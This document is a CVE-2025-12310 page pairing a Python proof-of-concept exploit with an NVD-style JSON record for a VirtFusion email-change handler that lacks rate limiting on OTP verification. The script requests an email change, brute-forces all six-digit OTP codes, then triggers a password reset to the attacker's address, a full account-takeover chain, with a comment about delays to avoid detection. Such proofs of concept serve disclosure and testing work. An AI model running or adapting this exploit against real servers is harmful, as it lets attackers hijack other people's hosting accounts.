CVE-2025-12310

import requests import itertools import string target_url = "http://target-server/account/_settings" target_email = "[email protected]" new_email = "[email protected]" # Generate all 6-digit combinations for brute force def generate_otp_codes(): for code in itertools.product(string.digits, repeat=6): yield ''.join(code) def exploit_cve_2025_12310(): """ PoC for CVE-2025-12310: VirtFusion Email Change Handler Improper Restriction of Excessive Authentication Attempts """ session = requests.Session() # Step 1: Request email change to initialize OTP init_payload = { 'action': 'change_email', 'new_email': new_email, 'current_password': 'any_password' } response = session.post(target_url, data=init_payload) # Step 2: Brute force the 6-digit OTP code for otp_code in generate_otp_codes(): exploit_payload = { 'action': 'verify_email_change', 'otp_code': otp_code } response = session.post(target_url, data=exploit_payload) # Check if email change was successful if 'success' in response.text.lower() or response.status_code == 200: print(f"[!] Valid OTP found: {otp_code}") print(f"[!] Email changed to: {new_email}") # Step 3: Reset password using new email password_reset_url = "http://target-server/password/reset" reset_payload = { 'email': new_email } session.post(password_reset_url, data=reset_payload) print("[!] Password reset request sent to new email") return True # Optional: Add delay to avoid detection # time.sleep(0.1) return False if __name__ == "__main__": print("CVE-2025-12310 PoC - VirtFusion Email Change Handler") print("Target: /account/_settings endpoint") print("Vulnerability: No rate limiting on OTP verification") exploit_cve_2025_12310()

{"cve": {"id": "CVE-2025-12310", "sourceIdentifier": "[email protected]", "published": "2025-10-27T20:15:51.943", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in VirtFusion up to 6.0.2. This vulnerability affects unknown code of the file /account/_settings of the component Email Change Handler. The manipulation leads to improper restriction of excessive authentication attempts. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-307"}, {"lang": "en", "value": "CWE-799"}]}], "references": [{"url": "https://vuldb.com/?ctiid.329982", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.329982", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.676825", "source": "[email protected]"}]}}